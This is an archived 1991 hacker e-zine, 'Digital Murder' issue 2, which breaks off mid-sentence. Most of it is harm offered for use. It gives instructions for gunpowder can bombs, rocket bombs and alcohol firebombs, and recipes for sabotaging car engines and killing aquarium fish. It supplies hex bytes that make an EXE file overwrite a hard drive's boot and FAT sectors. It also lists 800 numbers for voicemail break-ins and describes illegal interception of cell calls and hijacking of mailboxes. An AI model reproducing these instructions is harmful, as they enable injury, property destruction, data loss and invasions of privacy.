💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › DIGITALMURDER › dm002.txt captured on 2022-06-12 at 11:31:22.

View Raw

More Information

-=-=-=-=-=-=-

2





  
  
  
       ///  / ///  / /////  //  /       //    // // // ///   ///  ////  ///
      /  / / /__  /   /   /  / /       ///  /// // // /  /  /  / /     /  /
     /  / / /  / /   /   //// /       // // // // // ///   /  / /''   ///
    ///  / //// /   /   /  / /////   //    // ///// //  \ ///  ///// //  \



              A Magazine for Cyberpunks and Other Hi-Tech Low-Lifes
                                 

               Issue No. 02                        November '91

















          -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

            These filez are for educational and informational studies
            only.  The writers for Digital Murder will not be responsible
            for any use or misuse of information published in this
            disk-based magazine.  The magazine and its contents are
            free to the public and may be freely distributed in any
            form as long as Digital Murder magazine and the author
            is given credit.  

          -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                              Information is Power.


















 
  
  
  
  
                           E d i t o r ' s   N o t e z
                          -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

         Here it is!  Issue #2 of Digital Murder released, slightly
         late,  November 25th, 1991.  It'z been hell getting everyone
         motivated enough to continue a monthly 'zine but, as you can
         see, it was done.

         We got a lot of positive responses from readers and have heard
         that issue #1 hit 35 or so boards in the United Socialist Republic
         of America and a few boards overseas (Sweden, Switzerland, and
         Holland).  Thanks goes out to those few that I asked to spread
         the magazine and an even larger group that spread it without me
         asking. . . you know who you are.  

         Since the idea of using a P.O. Box flopped due to no one sending
         us mail to it, we have closed it.  If you were thinking about
         sending us a letter, sorry.  We have plans on getting an internet
         address as soon as I decide where to get it.  As well as the 
         internet address, we plan to start a usenet newsgroup.  We will
         put a complete list of addresses to reach us at in issue #3 which
         will be out December 15th.  So until issue #3 comes out, call
         The Backdoor at 901.386.6455 to leave comments, submit articles,
         pick up the current or previous issue, etc.

                                          - M o r p h e u s / Editor.
         ---------------------------------------------------------------
          D i g i t a l   M u r d e r  -  -  -  Backdoor (901)/386.6455
         --------A---D-a-n-g-e-r---K-u-l-t---P-r-o-d-u-c-t-i-o-n--------


         pg#.               I N   T H I S   I S S U E
         ----              ---------------------------
           3       Anachy For Sale---Neuron God & Mystic Blade's
                   guide to destruction.
                   
           6       Virus in My Soup!---Digital Terrorist brings
                   you more virus phun.
                   
           8       Virtual Networks---General/Technical file on a
                   few fone networks.  
                   
?@????5+???$QY?Month---Zapped brings another great
                   scan for your enjoyment.
                   
          12       Cellular Freqing---Eavesdropping on Cellular
                   calls with modified scanners.
                   
          14       Action Systems Fone Network Info by Technysis
                   
          16       Heaven's Trash---Final words from Morpheus.

         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
 
 
 
 
 
 
 
 
  
                                                                          3
                                                                           
 
                    - = A N A R C H Y   F O R   S A L E = -
                     By: Neuron God/INFOword/Danger Kult



    Sticky Coolwhip
    ---------------
    
    This first project involves three substances; Vinegar, Milk
    (whole), and Cool Whip.

    Heat the milk in a pot until it comes to a VERY  low  boil.
    Add vinegar until it  separates.  The  solids  are  CASEIN.
    Heard of it before??  heheh.. yeah, that's  the  shit  they
    used to use for superglue.  Now, all you have to do is make
    a good amount of this and  mix it  with  Cool Whip.  You'll
    have a fluffy white mixture which puffs up very nicely  and
    is sticky as hell.

    Possible uses:
                   Cake topping.  Fucks up dentures
                   (and regular teeth)
 
                   Cover for keyhole on car.. (guess)

                   Car design solvent.  Munches the paint
                   right off.

    Try freezing it.  If you've whipped it up enough, it should
    be fairly liquified and will run easily.  Freezing it  will
    give you a substance similar to a Jell-O pudding shit.  Try
    adding food coloring and putting it on a stick.. will taste
    like milk that's slightly older than God.



    Phun With Coke Cans
    -------------------

    Hell, you could use any kind of can for these as long as ya
    drain it, wash it, and let it dry WELL.  

    For this first project, you'll need to cut the  bottom  off
    of one of the cans.  Really old  scissors  that  are  still
    fairly sharp (and which won't be missed by, say, the  local
    store) are good for cutting cans since  they  cut  straight
    and quickly.  Cut the bottom off with about 1 inch of  thin
    metal left to make a cup-looking thing.  Take the  scissors
    and at about 1 quarter inch margins (one centimeter for the
    Euros, I know it's not equivalent, but it doesn't  matter),
    cut down the sides about  another  quarter inch.  Bend  the
    flaps down to keep from getting cut  while  you  work  with
    this thing.  If you have soldering experience,  solder  the
    flaps to the inside of the can just to make sure (this also
    makes it easier to use in other projects).








                                                                          4


    You can make a lot of these now if you  want  because  they
    will be the most-used part of the cans.  Don't  throw  away
    the top part yet because the sheetmetal-type  aluminum  can
    be used to make some AWESOME 'noisemakers'!! 

    Now that you have a few of these prepared, obtain some black
    gunpowder.  This is sold at some weapons  shops  (especially
    those which specialize in Black-Powder  or  antique-interest
    weapons, or which carry  shell  packing  materials  for  the
    rabid hunter who likes to repack shells). You should be able
    to get this without any permits but if you buy it in excess,
    questions will be asked.  To  be  safe, either  buy  packing
    materials (which can also be useful if you're  the  creative
    type) or buy from different stores around the area, rotating
    your supplier every week.

    We can now begin on our first 'device'.  In  model  rocketry
    hobby section of your local hobby store there are  specially
    made engines and ignitors for these  engines.  They  can  be
    used for our purposes seperately or together, so get  a  few
    of them.  The ignitors are electricity-based flamers and You
    will need some source of electricity (about 2-3 AA batteries
    should do the trick) and some  LONG  wires  to  connect  the
    flamer to the source.  Some Scotch tape (or any clear, light
    weight tape) is needed to hold  the  flamers  in  place.  In
    this project, you need to cut out some  of  the  scrap-metal
    from the long  upper  part  of  the  cans.  One  can  should
    provide at least enough for two of these devices.  Cut  just
    enough of the sheet metal out to totally encircle a  medium-
    powered rocket  engine  (I  like  the  A8-3  single  stagers
    myself).  The engine should be large  enough  to  carry  the
    weight of the metal.  When you have the  metal  cut  to  the
    proper size, move the engine FAR away and solder  the  metal
    into a cone.  Cut a small circle of metal just big enough to
    cover one end of the cylinder and solder it  in  place.  Let
    this cool OVERNIGHT just to be safe.  The engine should  now
    slide into and out of the  container  easily.  Depending  on
    what type of thing you want to  make, follow  the  remaining
    instructions:

    1: Bomb-- To make a bomb out of this, cut another  circle  out
              of the metal as though you were going  to  plug  the
              second end up as well.  Cut one side of this  circle
              just enough so that the igniter and wires can  still
              fit correctly to the engine.  Plug the  empty  space
              with something which is light but flammable, such as
              toilet paper or paper towels but not too  tight.  If
              you're too nervous to solder the  second  cover  on,
              use something like superglue or epoxy.

    2: Rocket/bomb--  The same as above, except that you can  pack
              some explosive substance at the closed  end  of  the
              container, then some toilet tissue or  Kleenex  (not
              very much on this one though), then the engine.  The
              engine must be superglued in just at the  bottom  of
              the tube where the rocket end is exposed so lift can
              be achieved. 






                                                                          5


              It is  advised  that  you  put  controlling
              surfaces on your rocket so it will be a little  more
              predictable.  Use light tape on  the  flamer  so  it
              will easily release when the  rocket  lifts  off.  I
              strongly recomend using some sort of launch guidance
              system, such as a part of a drinking straw glued  to
              the outside of the rocket and then set onto a  metal
              dowell that will keep it flying straight until  it's
              at a safe height.

              When the rocket reaches its top flight, it will send
              out a small explosion  at  the top which will ignite
              whatever you pack up there.

              The rocket works best with  custom-designed  rockets
              from your hobby store, with some slight modifications,
              such as an addition of the  explosive instead of a
              parachute or streamer. 
         
              The rockets may take a few  seconds/minutes
              to ignite, since some  flamers  aren't  as  good  as
              others.  If you make a heavy rocket, use as  big  an
              engine as it needs (you'll learn by experiment).

    Cans can also be used to make great alcohol lamps, ovens, or
    bombs.  Get a flamer from the previous projects, some  dena-
    tured alcohol (6xx proof!!! don't drink it!!) and  some  can
    bottoms.  Drill a hole in one can bottom big enough to  work
    with, but not so big as to be unpluggable.  Solder this  one
    to an unmodified can bottom to make  a  container  with  two
    bottoms.  The hole should be in the center of the bottom  of
    one of the  cans.  Pour  the  alchohol  into  the  container
    slowly through the drilled hole until it is about 3/4  full.
    Put a flamer in the hole so that it just barely touches  the
    alcohol.  Tape this sucker  up  good  and  superglue  it  if
    possible.  The flamer should ignite the  alcohol  which  has
    just enough air to burn  good,  and  the  cans  will  either
    implode or explode depending on whether the  alcohol  cathes 
    fire good or not.  It may just use up some of the oxygen and
    create a partial  vaccum,  or  it  may  explode  and  spread
    burning alcohol quite a distance.

    A full can of a carbonated drink can be fun, too.  Shake  it
    up, roll it around, throw it up in the air (if you throw  it	
    really high, catch it.  If not, let it hit the ground).  Try
    putting it over a LOW flame on a grill.  When it  starts  to
    bulge, remove it.  After doing any/all of these things, take
    it to a tall building with a stairway.  If it is  like  most
    stairways, there will be some space in the center where this
    can be dropped.  With the combination of the pressure inside
    the can and the force of it  falling,  the  impact  will  be 
    quite messy (and if not found for a few days, sticky, smelly
    and hazardous to the new paint job too...   heheh..)  It  is
    hell to clean up.. just try to get the can to add that extra
    touch to the question "What the Hell happened here?"    They
    won't even know where to begin asking questions...







                                                                          6


    All of these ideas can be expanded upon, modified,  or  just
    plain used in unusual ways.  Remember,  always  be  creative
    with your methods of destruction...  NG '91 -- InFOWOrd/ DK.


    Awful Magic Powder - by: Mystic Blade!
    ------------------
    
    Needed
    ------
            * 6 or 7 cans of Arid Extra Dry spray.
            * 1 closet size mirror
              * Note * You can scale this done to just a bathroom
              mirror or any flat smooth surface. 

    Spray the surface of the mirror until completey solid white.

    Let it set and dry for the next 24 hrs. then scrape of the
    residue.  Do this until all the Arid is gone.  You now have what's
    known as Great awful magic powder.


    One ounce of this powder per automobile gas tank will screw up an
    engine.

    A single teaspoon will kill off a 10 gallon fish tank and all the fish.
    
    Till fun is fun....Im outta here!  *Mystic Blade*



                              /\/\/\/\/\/\/\/\/\/\
                               An Algebra of Evil
                              \/\/\/\/\/\/\/\/\/\/
                              More Virus Info from
                               Digital Terrorist!

    More Hard Drive Phun!
    -=-=-=-=-=-=-=-=-=-=-

         Hey,  you  anarchists  trying  to learn something, This is for
    you!  I just thought you might find it interesting...

    Do you know that you can destroy a hard disk by writing 18 bytes
    to the end of an EXE file (you can do it with 14 but I'll just do
    this for the sake of simplicity).

    Ok, to use this look for the last occurence of CD 21 (or m! in ascii)
    with some type of hex/ascii editing program.  Once you have found it,
    insert these hex codes after that last CD 21.  Be careful...  Don't
    run this program after you have "fixed" it unless you want to re-
    format your HD.  Here goes...











                                                                          7


    (insert these bytes of hex code in after the final m! [CD 21].
    Notice that the m is ascii 205 not an equal sign (=).)

    B4 03
    B0 C8
    B5 00
    B1 01
    B6 00
    B2 02    (the 02 stands for the C drive.  You can specify 00 for
              A drive, or 01 for B drive, etc...   This is the drive
              that you want to destroy.)
    CD 13
    B4 4C
    CD 21
  
    Well, that's pretty much it.  Viruses are made in a way such as
    that the virus takes code such as this and manually inserts  it
    into an EXE or COM file along with the code  that  it  has  for
    self replication.  Also, notice that this code is made to write
    over the boot, FAT, and root directory sectors  with  just  any
    ole' address out of memory...  ( whatever is in the DS  and  DX
    registers at the time ).  Note that you can  also  insert  your 
    code BEFORE the last CD 21 by inserting it two bytes before the
    last CD 21 (those two bytes in fact should be B4 4C).  Once you
    do that, you can cut this code down to 14 bytes by  eliminating
    the final four bytes (B4 4C CD 21).

    File Phun
    -=-=-=-=-

    Scanning files in directories, and changing the entry of the
    "starting cluster" and the file size.  By  changing, I  mean
    swapping with other files so, therefore, if you once had  an
    EXE file called READTHG.EXE and some other files, you  would
    mysteriously find that READTHG.EXE contained another EXE,  a
    data file, or a text file.

    How do you do it?  No problemo...  First you ascertain  info
    from the boot sector on where the  FAT  and  root  directory
    sector are located which will be explained later.  Then  you
    pick out the root directory sector.  Filename entries  in  a
    directory sector are stored as such:

      [ Filename- 11 bytes no period!] [Attribute- 1 byte]
        XX XX XX XX XX XX XX XX XX XX XX XX

        [Reserved by MS-DOS- 10 bytes] [Time/Date stamp- 4 bytes]
        XX XX XX XX XX XX XX XX XX XX  [Time]  [Date]
                                       XX XX   XX XX

        [Starting Cluster- 2 bytes]  [File Size- 4 bytes]
        XX XX                        XX XX XX XX

        Notice that the XX's are hexadecimal numbers.









                                                                          8


        1.  Filename is padded with spaces between the first eight and
            the last 2. ie HELLO  DOC... It MUST be padded with spaces
            if it is to be used.

        2.  Attribute: 
                      Read Only-    hex 01
                         Hidden-    hex 02
                        Archive-    hex 20
                   Subdirectory-    hex 10
                   Volume Label-    hex 08
                         System-    hex 04

        When these attributes are combined (say read only and hidden),
        they produce hex 03, or the sum of their numbers.

        3. Time/Date stamp will almost ALWAYS be irrelevant to a good
           anarchist.

        4. Starting Cluster- this is the cluster where the file  starts.
           DOS reads the FAT chain and determines where ALL of that file
           is but if this and file size are swapped  with  other  files, 
           pandemonium will break lose.

        5. File Size- this is represented by a 4 byte binary number, the
           rightmost digit being most signifigant.

        Well, that should pretty much give you plenty of information  to
        do that nice little thing, or plenty of other things.




                           Virtual Telephone Networks 
                            General/Technical Outline
                        Written and compiled by Morpheus.
                       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                       

         This technical journal on Telephone Networks has been
    compiled to introduce the basics of them to  newer  phreakers
    yet does contain a lot of information that will interest  the
    more advanced reader.


    History of Virtual Networks
    =-=-=-=-=-=-=-=-=-=-=-=-=-=

    To be honest, virtual networks are nothing new since many LDS
    companies, such as AT&T, MCI, and Sprint, have been  offering
    them since 1985.

    ISACOMM (now US Sprint) was the first to introduce a  virtual
    network  service,  using  Satellite  Business  Systems  (SBS)
    satellites as early as '84.  SBS acted as the  carrier  while
    ISACOMM  was  responsible  for  promoting  and  managing  the
    service.







                                                                          9


    SBS introduced it's own network in early '85  and  was  later
    bought by MCI.

    Also in 1985, US Telecom redifined ISACOMM  as  VPN  (Virtual
    Private Network) which is now the base for Sprint.  Later on,
    AT&T introduced its Software Defined Network (SDN) product.
    

    AT&T's  SDN
    =-=-=-=-=-=

    When a user picks up his phone at an  on-net,  dedicated  SDN
    site and dials a number, the dialed digits are  sent  to  the
    serving AT&T SDN office through the local network.  This  SDN
    office receives the dialed digits, and notes the  originating
    number via ANI (Automatic Number Identification).  This  info
    is passed to the ACP (Action Control Point), which will  then
    check the NCP network database for  routing  and  translation
    information based on the ANI of the user.  After the check is
    complete, the NCP returns appropriate routing information  to
    the ACP, which encodes a billing record  and  send  the  call
    through the network.

    AT&T  has  marketed  many  special  features  with  SDN.  For
    example, when the NCP receives the call information from  the
    originater of the call, it can screen the call  according  to
    a set of valid originating numbers to see if the call is even
    allowed to be sent through the network.  It can also be setup
    to request an authorization code to validate  calling  privs.
    It can prompt certain screened calls with preprogrammed  ann-
    ouncements to provide options for routing.

    Off-net calls follow a similar procedure in which the user of
    the SDN dials an off-net access number (800- or 950-) or  can
    access the network through switched  equal  access.  In  this
    case, the dialed digits and any code entered are screened and
    sent to the ACP, and then gets instructions from the NCP.

    Whenever announcements are required, they are sent  from  the
    Network Services Complex (NSC).  Thus, if the network were to
    ask for an authorization code, the message would be sent from
    the NSC.

    Map of SDN:
    ----------                     Features
               SDNCC               --------
           SMS     --\--              !! 
           -\-        \    +----------!!--------------+
             \         >-->!-->-->->+-!!--+        A L!
              \            !        ! NCP !        T D!
               >-->-->-->-->-->-->->! --- !   NSC  & N!
                           !        /-----\   /    T  !
                           !       /       \ /        !
                           !     ACP       ACP        !
                           +-----/----------\---------+
                                /            \
                           SDN Dialup     SDN Dialup






                                                                         10


    MCI's  VNET
    =-=-=-=-=-=

    This network uses three types of switches:  1) Northern Tele-
    com DMS-250, 2) DEX 400, and 3) DEX 600 by Digital Switch Co.
    MCI uses SS7 (signal system 7) on all of  their  intermachine
    trunks.

    When a user picks up the phone and calls the  dialup,  it  is
    connected into the MCI Vnet network similarly to SDN by AT&T.
    The routing of a Vnet call  starts  with  a  request  from  a
    digital switch to the Network Control System (NCS) for  route
    information.  This request travels through one  of  the  Data
    Access Points and then the NCS checks the customer's database
    for routing information, call privileges, etc. and sends that
    information back to the switch, again through the DAP.  After
    all this, the call is sent through.

    Map of Vnet:
    -----------
    Dial '1' or Vnet Card Access            Calling thru Dialup
    ------------!!!-------------            --------!!!--------
                !!!                                 !!!
     (Telco C.O. switches call)    (Telco CO doesn't switch call)
                !!!                                 !!!
         +--------------------+           +--------------------+
      /<-- MCI Network Access !-----------! MCI Network Access -->\
      !  +--------------------+           +--------------------+  !
      !         !!!                                 !!!           !
      !         !!!                                 !!!           !
      \      MCI Switch                          MCI Switch      /
       \                   +----------------+                   /
        >-->-->-->-( DAP )-!     N.C.S.     !-( DAP )-<--<--<--<
                           +----------------+


    US Sprint's VPN
    =-=-=-=-=-=-=-=

    US Sprint uses 100% fiber optic networking and uses powerful
    Northern Telecom DMS-250 switches linked by SS7, with DMS300
    switches as international gateways.

    When a US Sprint VPN user picks up the phone, dials a  local
    VPN system, and calls through it, the call is  forwarded  to
    a serving point.  That switch, through its Message  Switch &
    Buffer (MSB) signaling point, sends a routing request to the
    nearest Signal Transfer Point (STP).  The STP passes the re-
    quest to the Database Control Point  (DCP)  for  processing.
    After checking the customer's database account, the info  is
    sent back to the MSB.  The call is then sent through.












                                                                         11


                     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                      Digital Murder Scan 'o' de Month! 
                     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
          
    Zapped here with another scan for all of you phone
    junkies out there.  This scan, as you will see below, is of
    the 233 prefix.  If you missed last month's article, it was
    on the 336 prefix.  Get in touch with us. . . we have all
    back issues on file.

    Prefix owned by:  AT&T

    Voice Mail Systems
    ------------------
    1-800-233-0010  After Business Hrs VMB
    1-800-233-0065  Methodist Hospital--listen or hit 0.
    1-800-233-0214  Knoll Sue's VMB--listen for menu.
    1-800-233-0316  * + 4 digit boxes.
    1-800-233-0407  First Trust---
    1-800-233-0567  Corum 'Hell'--* or #.
    1-800-233-0618  experiment with--uses 'numeric messages'
    1-800-233-0713  Datanational-- *
    1-800-233-0995  Griffen Services-- #  3 digit boxes
    1-800-233-1000  Audix VMB
    1-800-233-1106  * -- 3 digit boxes
    1-800-233-1304  Aetna - */#  4dig.boxes
    1-800-233-1717  4dig.boxes
    1-800-233-1808  3dig.boxes
    1-800-233-1903  Beacon's NW--*/# (fairly easy)
    1-800-233-2025  (currently using an old VMB sys.)
    1-800-233-2119  Spectrum */#  3digboxes(excld.1,2)
    1-800-233-2250  Credit and Leasing Corp.  
    1-800-233-2331  Billing Dept of DTOM
    1-800-233-2400  Am. Murex Corp.
    1-800-233-2450  Armstrong---Dictation Service...interesting
    1-800-233-2520  Interesting System...
    1-800-233-2617  uses Audix--listen or hit *7
    1-800-233-2875  */# 3digs.boxes
    1-800-233-3029  Penox Tech.--*/#
    1-800-233-3200  0+1 for VMB
    1-800-233-3314  ?
    1-800-233-3411  0+1 for VMB
    1-800-233-4007  ?
    1-800-233-4606  Bank of San Fran--haven't messed w/it
    1-800-233-4800  #+* ...3dig boxes
    1-800-233-5969  *+ext/# for VMB
    1-800-233-6269  */#
    1-800-233-6300  *+x (x=dig 0-9)
    1-800-233-6789  */#
    1-800-233-9069  alwayz busy...couldn't verify
    1-800-233-9175  same as 9069
    1-800-233-9325  same as 9069
    1-800-233-9477  listen for menu
    1-800-233-9575  same as 9069
    1-800-233-9650  same as 9069








                                                                         12


    Carriers
    --------
    1-800-233-0037 (expected hello,:job,:data,or(cmd),as logon.(cierr 1402)
    1-800-233-0692 (<<please enter logon>>)
    1-800-233-0887
    1-800-233-1217 (wierd pulse then carrier and kicks off line)
    1-800-233-2921 (???)
    1-800-233-4224 (performance 200 emulex)
    1-800-233-4700 (towers perrin online -- phila  --press enter)
    1-800-233-5315 (gives > prompt)

    PBXs/etc
    --------
    1-800-233-1925
    1-800-233-3750


    Fax's & Misc.
    -------------
    1-800-233-0180
    1-800-233-0904
    1-800-233-1210
    1-800-233-2180
    1-800-233-2850
    1-800-233-3504
    1-800-233-4479
    1-800-233-5169
    1-800-233-5170
    1-800-233-6150


    Thats it for this month so be watching next time for more
    and hopefully more interesting numbers to play around with
    so until then Ive been. . . .  Zapped!



         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                      Scanning for Phun and Information.
                                 By: Chizz
         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    Scanners are wonderful toys.  They allow us to listen to info
    that otherwise would be impossible to hear.  Everyone has heard
    of using scanners to listen in on police and fire, but that gets
    old after a while.  One can only hear so much of police calling
    in stating that they are going on a doughnut break.  Now there is
    a use for a scanner that is much more interesting, not to mention
    fun: listening in on cordless phones and cellular phones.
    One day, blackened buffered a post off of a board that listed the
    10 cellular frequencies.  There are 10 for the base and 10 for
    the handset.  The base frequencies are the most powerful, there-
    fore these are the ones that should be put into the scanner.  I
    did not except much while i reluctantly inputed the frequencies
    but after I fired up and started scanning, I could not believe
    my ears.  







                                                                         13


    Picking up my neighbors is really quite interesting.  I have
    heard everything from a woman's daughter being pregnant to a
    couple owing 10,000 dollars in back taxes, and their unhappiness.
    It is so easy to pick up these cordless phones that it is funny.
    
    Cordless phones can be picked up by any programmable scanner such
    as the $139.00 Radio-Shack pro-38, 10 channel programmable.
    Below is a list of the cordless phone frequencies:

           Channel                  Base                      Handset
              1                    46.610                     49.670
              2                    46.630                     49.845 
              3                    46.670                     49.860 
              4                    46.710                     49.770
              5                    46.730                     49.875  
              6                    46.770                     49.830 
              7                    46.830                     49.890
              8                    46.870                     49.930 
              9                    46.930                     49.990
             10                    46.970                     46.970 

    Now onto the more interesting and lively world of cellular
    phones.  You must have a scanner that is 800 megahertz capable.
    My personal choice is a realistic pro-34.  This is a hand-held
    model that has 200 channels, built in backlit lcd, and 10 
    channel temporary storage, for an effective capacity of 210
    channels.  This scanner runs for about $300 bux but I bought
    mine at a pawn	shop for $120.  The true cellular band is from
    869.0000 mhz to 894.000 mhz.  For some reason the powers that
    be convinetly omit the cellular band, instead, stopping at
    868.9375 and resuming at 896.1125 on the pro-34.  If you are
    happy listening to "mobile" phones, more appropriately known
    as two way radios, that operate in the 800 mhz band then a
    "stock" scanner is fine but if you are like me, that's just
    not enough.

    I was looking through a copy of radio-electronics one day and
    noticed that there was a scanner BBS.  I called this bbs and
    downloaded a text file that contained the steps to modify a
    pro-34 for true cellular capabilities.  There is not room here
    to go into how to modify the scanner but call the Red Onion BBS
    at (914) 342-4585 to get the file for this scanner or any other
    scanner (they have files for all popular scanners).  After making
    the modifications, you can start the search scan at 869.0000
    to 894.0000. 

    If you live a large city, the cellular band is active at all times.
    I have listened to calls with subjects such as drug deals,
    prostitution, people growing their own dope, and a lady talking
    about using dildos.  One particully funny moment was when this one
    guy got into a fight with his girlfriend, went out and got drunk,
    and on his way home he called up his girlfriend crying and moaning
    and then he got pulled over for drunk driving.  It is also a

 
 
 
 
 
 
 
 
 
                                                                         14 
 
 
    good way to get information if you have a DTMF decoder.  A lot of
    people that have cellular phones also have VMB's.  You can listen
    in as they call their system and if you are familiar with the
    system that they are on, you can call up and take over their box.

    If you think that this would be an interesting thing to do then
    be sure to do it soon because in the next ten years or so all
    cellular services will be switched from analog to digital making
    it impossible for a conventional scanner to be able to decode the
    conversations.  If you have any questions, or information that
    you have found useful then please leave me mail on Digital murder's
    WHQ, The Backdoor BBS at (901)/386-6455.



                          --------------------------------
                         Disection of the ACTION Roadrunner
                            Telephone Management system
                          --------------------------------
                                   By:Technysis

          This  series  of  artices  to  follow  has  taken  much time
          and extensive coverage.   I  see  these  articles  as  truly
          original material, as I went through personal connections to
          get the information contained here.
          
         The following information was taken  from  various  technical
         sources and other misc. information from a rural area here in
         my state. I live in Memphis, which  is  under  ESS,  however,
         where I was at, they were under some other older system.

         The  Action  Roadrunner  Telephone  Management  System  is  a
         computer controlled routing,  tandem  switching  system.   As
         such, the system functions in support of an existing PBX type
         system and may be configured for network  operations  between
         properly equipped locations.  Through these  of  the  network
         capabilities,  a  business can impliment a private network to
         reduce overall call costs and record  network/system  traffic
         statistics.  Network operations are provided by extending the
         local serial bus of the Master node to control the  operation
         of  satellite  nodes and collect call record data from Remote
         intelligent nodes.  Unintelligent (noncomputerized) satellite
         nodes  are  controlled exclusively by the intelligent node to
         which they are connected by data link  and  tie  lines.   The
         Intelligent  Remote  nodes  direct  their own call processing
         functions and those of their associated Satellite nodes.   In
         this  configuration,  the Master node serves as a centralized
         record  collection   point   while  providing  a  centralized
         database update point.

         The  support  equipment  expalined  serves  to   expand   the
         interfacing  capabilities  of  the  system  by  accommodating
         ground  start-type  trunk  circuits  and  collected  key-type
         systems.  Other equipment, when optionally  selected  by  the
         CO,  is  designed  to provide remote access from rotary tele-
         phone by the Voice Terminal Device.







                                                                         15
      
       
         VCA Subsystem
         -------------
         
         A Pulsecom Voice Connecting Arrangement  (VCA)  subsystem  is
         used  instead  of Telco-supplied CDH-type VCAs.  Each circuit
         card interfaces one system port to one  Telco  trunk  circuit
         (DDD,  WATS, or FX).  These cards are housed in 10 card cages
         which  are  assembled  into  a  wall  mounted  rack  assembly
         containing  eight  card  cages  for  a  total of 72 VCAs on a
         freestanding rack assembly containing 16  card  cages  for  a
         total of 144 VCAs.

         Amplifier Subsystem
         -------------------
         
         Trunk  amplification  is  used  to adjust and stabilize trunk
         levels appearing at the  system  while  being  OFF  when  the
         circuit  is  not  in  use.   The single-channel circuit cards
         (repeaters) housed in 11-slot card cages are assembled into a
         wall  mounted  rack assembly which can contain up to six card
         cages for a total of  66  amplifiers  per  rack.   Each  rack
         requires  a  dedicated  120  Vac  15 amp circuit to power the
         -48 Vdc power supply which supplies the required power to the
         card cages.  Two amplifier circuit card types  are  available
         for  voice only or voice/data circuits.  A voice-only circuit
         uses the UM-100 Amplifier Card and a voice/data circuit  uses
         a  VFR-1050  Amplifier  card.  Both card types share the same
         card cage.  One 25-pair cable is used per  card  cage.   Each
         circuit  consists  of two-cable pairs for a total of 22 pairs
         within each cable.  The first cable pair is connected to each
         of  the  Telco  side of the demark and the second pair to the
         ACTION side.
         
         The UM-100 Amplifier Card is equipped with a UM-3502  Plug-on
         Option  card  which  is  used to program the amplifiers oper-
         ation.  Two adjustment options are also  available  with  the
         3502  card.   The  VFR-1050  Amplifier  card is supplied with
         progammable options as well.  This card  is  used  when  data
         transmissions are anticipated on the connected trunk circuit.

         The  VFR-1050   Amplifier   Card  options  given  consist  of
         amplifier   gain    adjustment,    equilization   adjustment,
         sensitivity slope adjustment, and a  disable  on/off  switch.
         
         Keyset Adapter Subsystem
         ------------------------

          The Keyset Adapter subsystem is employed to permit telephone
          circuits that are not associated with a PBX type  system  to
          be  interfaced  to  the  system.  Key systems  or  dedicated
          single-line  instruments  may  access  the  system  by  this
          subsystem.  The Keyset Adapter Subsystem may  be  configured
          in  a  free  standing  rack (128 circuits max.) or on a wall
          mounted unit (48 circuits max.)  The two circuit cards  that
     
      
      
      
      
      
      
      
      
                                                                         16
      
      
          make  up  the  Keyset  Adapter  Circuit  are the E&M-to-Loop
          Converter Card and the Dual Line Coil Card.  The  Dual  Line
          Coil Card accommodates two E&M-to-Loop cards.  The cards are
          clustered in groups of three with the Dual Line Coil Card in
          the center to provide two circuits.  Three clusters of three
          cards each supply six circuits per card  cage  in  the  wall
          mount  unit  and  four  clusters yielding eight circuits per
          card cage in the free standing rack.

         Voice Terminal Device
         ---------------------
         
         The Voice Terminal Device (VTD) is a  word  recognition  sub-
         system configured into a single cabinet.  The VTD is composed
         of a cental processor, a vector processor, memories, and  I/O
         devices  for  eight  system ports.  The System port cards are
         configured for 2-wire operation with 0db pads  and  serve  as
         the bidirectional VTD interface.

         The  System  port  cards  used  for  the  VTD  are located in
         consecutive card cage slots within a single card  cage.   The
         first  card is a Voice Terminal Serial Interface Card and the
         next seven  cards  are  Audio  Interface  Cards.   The  Voice
         Terminal  Serial  Interface card accepts the binary output of
         the VTD for the  eight  serial  ports.  Theu|Y| decoded output of
         each of the right ports is sent to the Voice Terminal  Serial
         Interface card in the first port.
         ----------------------------------

         Hope  that  was  at least a little bit interesting.  That was
         nowhere near the complexity of explainng ESS.   However,  the
         little  trip to the past could prove useful because many sys-
         tems such as these are still in  use.   I  will  have  future
         articles on the Action  system  but  for  now  I  can't  type
         anymore...  Hehehe..

         Later  all and don't forget; Bell holds the ultimate in info-
         rmation and power from us but they will not be able  to  hold
         back  the flood of hackers breaking away at their wall.  Long
         live the cause.

                       -/-\-/-\-/-\-/-\-/-\-/-\-/-\- 
                        H e a v e n ' s   T r a s h
                       -\-/-\-/-\-/-\-/-\-/-\-/-\-/-

    Strip away the blanket of secrecy!  Here's a few books I've
    found that I encourage you to order and READ.

    The Brotherhood by Stephen Knight--
    Take a look behind-the-scenes at the inner workings
    of the Masons, a tightly knit, all male society whose
    members hold some of the highest posts in business and
    government. . .and who are bound by an iron-clad oath
    of secrecy.  --$8.95










                                                                         17

    Big Secrets by WIlliam Poundstone--
    this book blows the lid off some of the world's best
    kept secrets.  You'll learn how to beat a lie-detector
    test, get the low down on secret messages and subliminal
    advertising, and how U.S. currency is made.  --$8.95

    Make My Day by George Hayduke--
    Don't get mad, get even!  Make My Day covers every type
    of revenge from simple pranks to complex plots.  You'll
    learn hundreds of devious, diabolical ideas for getting
    even.  --$7.95

    Those books can by ordered by calling 1-800-282-8086.


    ------------------------------------
    The Anarchist Cookbook-----$21.95
    The Poor Man's James Bond--$21.95
    Shipping/Handling-----------$4.00
    (602)/634-6280
    Those can be purchased at named prices from:
    BUTOKUKAI
    P.O. Box 430 Dept. SG
    Cornville, AZ  86325
    ------------------------------------

    You can get the Anarchist Cookbook a little cheaper by ordering
    it from the publishers ($22.00 postpaid).
    Barricade Books
    Box 1401-F
    Secaucus, NJ  07096
    -----------------------------------

    If you are into punk, alternative, ''new-wave'', or whatever
    you wanna call it or are interested in reading some good
